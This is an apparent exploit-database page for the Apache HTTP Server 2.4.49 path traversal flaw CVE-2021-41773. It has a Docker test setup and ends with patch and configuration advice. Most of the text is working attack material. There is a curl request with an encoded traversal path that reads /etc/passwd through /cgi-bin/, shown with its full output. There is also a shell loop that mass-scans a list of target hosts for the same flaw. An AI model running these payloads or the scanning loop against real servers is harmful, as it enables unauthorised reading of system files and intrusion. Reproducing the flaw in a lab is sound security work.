Exploit for Path Traversal in Apache Http Server CVE-2021-41773

Name: Exploit for Path Traversal in Apache Http Server CVE-2021-41773
Rating: 5 (115 reviews)
2021-10-06 | CVSS 4.3
## https://sploitus.com/exploit?id=3C5B500C-1858-5834-9D23-38DBE44AE969
# CVE-2021-41773
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

## Info
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.

If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.

This issue is known to be exploited in the wild.

This issue only affects Apache 2.4.49 and not earlier versions.

Acknowledgements: This issue was reported by Ash Daulton along with the cPanel Security Team

Reported to security team	2021-09-29
fixed by r1893775 in 2.4.50	2021-10-01
Update 2.4.50 released	2021-10-04
Affects	2.4.49

### POC

```
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
```

### Confirm it works

```
$ curl -I http://localhost
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 13:25:18 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html
```

### Exploit 1

```
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
```
#### Output
```
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
utmp:x:100:406:utmp:/home/utmp:/bin/false
```
### Exploit 2

```
cat targets | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
```
#### Output
```
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
localhost Vulnerable
```


## How to fix
1. Update Apache HTTP Server 2.4.50 released 2021-10-04
2. Deny and edit the following in apache2 config file:
```
<!-- Vulnerable (Require all granted in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>

<!-- Patched (Require all denied in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all denied
</Directory>
```

## References
- https://httpd.apache.org/security/vulnerabilities_24.html